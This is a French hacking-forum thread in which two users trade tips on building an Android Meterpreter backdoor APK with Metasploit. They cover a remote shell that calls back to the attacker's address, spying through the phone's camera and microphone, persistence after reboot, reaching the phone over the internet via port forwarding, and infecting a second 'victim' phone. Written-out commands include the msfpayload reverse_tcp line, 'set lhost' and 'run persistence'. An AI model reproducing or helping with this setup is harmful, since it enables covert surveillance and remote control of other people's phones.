Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 02-06-2014 10:25:31

goodsayan
Membre
Inscription : 02-06-2014
Messages : 15

utiliser Metasploit sur victime android

Bonjour,

J'ai suivi ce tuto pour installer un remote shell sur mon mobile android avec metasploit.
http://cyberarms.wordpress.com/2014/02/ … etasploit/

L'apk a été crée et installée sur mon téléphone.
Sur mon PC linux, je lance l'exploit et sur mon téléphone j'ouvre l'application. Tout fonctionne parfaitement, je peux prendre des photos, écouter le micro etc... en LAN comme en WAN.

Si je reboot le pc et le téléphone et que je relance metasploit, le remote shell ne se lance pas automatiquement. Il faut que j'ouvre l'application sur le téléphone à chaque fois... J'ai essayé avec une application du type autostart pour lancer l'application mais cela ne fonctionne pas...

Question 1:
J'aimerais donc activer le remote shell sans avoir à lancer l'application sur le téléphone.
Est ce possible? Comment faire cela?

Question 2:
Si j'installe l'apk crée avec metasploit sur un 2eme téléphone, comment cela se passe t'il? Est ce que metasploit peut gérer 2 victimes simultanément?


Merci

Dernière modification par goodsayan (02-06-2014 10:30:01)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 02-06-2014 12:43:34

papillonH
Membre Actif
Inscription : 02-06-2014
Messages : 29

Re : utiliser Metasploit sur victime android

Bonjour goodsayan
je m'initie aussi a metasploit...jette un oeil au niveau de la persistence metasploit le lien :persistence metasploit

Dernière modification par papillonH (02-06-2014 12:43:58)

Hors Ligne

#3 02-06-2014 12:59:49

goodsayan
Membre
Inscription : 02-06-2014
Messages : 15

Re : utiliser Metasploit sur victime android

Bonjour papillonH!
Merci pour le lien je testerai cela ce soir si j'ai le temps.

J'ai plusieurs questions cependant à propos de ce passage
"The persistent Meterpreter as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk."

Question 1:
Existe t'il la persistance avec authentification?

Question 2:
Lors de la création de l'apk avec metasploit avec la commande
sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk

192.168.1.16 est l'adresse de l'attaquant. Je ne comprends pas trop les risques dont ils parlent puisqu'il faut que l'adresse IP corresponde à celle de l'attaquant et que l'apk soit configurer avec la même IP.

Comment une tierce personne pourrait faire cela?
Il faudrait qu'il connaisse l'adresse IP mise dans l'apk, le port utilisé etc... Qu'il réussisse à usurper l'adresse IP mise dans l'apk... Ca me parait beaucoup ou je me trompe?

Hors Ligne

#4 02-06-2014 13:18:15

papillonH
Membre Actif
Inscription : 02-06-2014
Messages : 29

Re : utiliser Metasploit sur victime android

je pense qu'il veulent faire allusion du fait que la connection reverse tcp n'est pas sécurisé ,qu'il n'utilise pas le port 443
du genre https...ssl en gros on pourrait sniffer avec wireshark ou autre...
je suis débutant au niveau reseau mais je me renseigne...
j'essairai de t'en dire plus après reflexion:/

les risques ne sont pas si grand puisque tu est en réseau local

Dernière modification par papillonH (02-06-2014 13:23:19)

Hors Ligne

#5 02-06-2014 13:22:31

goodsayan
Membre
Inscription : 02-06-2014
Messages : 15

Re : utiliser Metasploit sur victime android

Ok si tu trouves la réponse ;-)
Perso lors de mes tests en WAN, si j'utilise le port 4444 cela ne fonctionne pas.
J'ai mis du coup le port 443 et la cela fonctionne parfaitement. J'avais lu un article disant que les autres ports étaient bloqués en WAN sauf le 80 et 443.

Hors Ligne

#6 02-06-2014 13:24:11

papillonH
Membre Actif
Inscription : 02-06-2014
Messages : 29

Re : utiliser Metasploit sur victime android

ok je comprend tes craintes:lol:
mais d'après le lien que tu nous  a donné le tuto est fait en local roll pourrait tu donner les manip pour le faire "over internet" si tu le veux bien ,il me semble qu'il faut reconfigurer ton routeur ..non?

Dernière modification par papillonH (02-06-2014 13:36:19)

Hors Ligne

#7 02-06-2014 14:59:08

goodsayan
Membre
Inscription : 02-06-2014
Messages : 15

Re : utiliser Metasploit sur victime android

Pour le WAN c'est quasi pareil.

Tu remplaces juste ton adresse locale 192.168.0.X par ton adresse internet 82.226.XXX.XXX dans la commande:
sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk
Suis chez free, mon IP est fixe. Si tu es en dynamique, il faut utiliser DynDNS, je crois bien.

Puis tu vas dans ton routeur et tu rediriges le port vers le pc ou tu utilises metasploit.
J'ai tenté 4444 (enfin un port exotique) mais sans succès. Obligé de passer par le port 443 sur mon téléphone android.

Et tu adaptes les commandes metasploit set lhost 192.168.1.16 devient en WAN set lhost 82.226.XXX.XXX

C'est tout bête!

Dernière modification par goodsayan (02-06-2014 15:04:00)

Hors Ligne

#8 02-06-2014 15:33:42

papillonH
Membre Actif
Inscription : 02-06-2014
Messages : 29

Re : utiliser Metasploit sur victime android

Merci pour les infos wink je me disais bien qu'il ya avait cette histoire d'ip fixe
en tout cas ca fait plaisir de partager sur ce forum surtout avec des gens comme toi:)

Dernière modification par papillonH (02-06-2014 15:34:49)

Hors Ligne

#9 04-06-2014 18:50:19

goodsayan
Membre
Inscription : 02-06-2014
Messages : 15

Re : utiliser Metasploit sur victime android

C'est vrai que c'est sympa de pouvoir échanger sur ce sujet.

J'ai tenté la persistance avec cette commande en local:
run persistence -A -X -i 10 -p 4444 -r 192.168.0.9

Mais j'obtiens ca
java/java version of Meterpreter is not supported with this Script!

Vais essayer de voir d'ou ca vient.

Hors Ligne

#10 04-06-2014 19:21:40

papillonH
Membre Actif
Inscription : 02-06-2014
Messages : 29

Re : utiliser Metasploit sur victime android

Bonsoir Goodsayan
lors de notre précedente discution tu m'avait informé que t'es tests ne fonctionnaient pas avec le port 4444 ca viens peut etre de la qui sait ....je ne suis pas assez calé ...mais bon le message d'erreur est assez explicite

Hors Ligne

#11 04-06-2014 19:31:19

goodsayan
Membre
Inscription : 02-06-2014
Messages : 15

Re : utiliser Metasploit sur victime android

En local, tu peux choisir n'importe quel port cela fonctionne. C'est en WAN que c'est différent.
Mon test de persistence a été fait en local donc 4444

J'ai mis a jour msfupdate, fait un update et udgrade mais toujours ce message d'erreur java.

Hors Ligne

#12 04-06-2014 20:32:43

papillonH
Membre Actif
Inscription : 02-06-2014
Messages : 29

Re : utiliser Metasploit sur victime android

Mille excuse Goodsayan
j'ai lu avec precitation je pense apres reflexion que c'est ta version de java qui n'est pas compatible essaie de la mettre a jour ou fait une recherche pour voir qu'elle version est compatible ...mais je pense que tu saura te débrouiller;)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
2 68 Hier 21:54:52 par GreyBird
Liste de tools pentest android par ✞θ!ก∃℧┌
9 2224 28-10-2016 01:16:42 par oursencolere
4 465 28-04-2016 20:16:52 par pasdepseudo123
0 1136 19-04-2016 18:23:42 par 2tlopez51
0 2822 13-07-2015 21:15:05 par JeanCharles

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.033 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]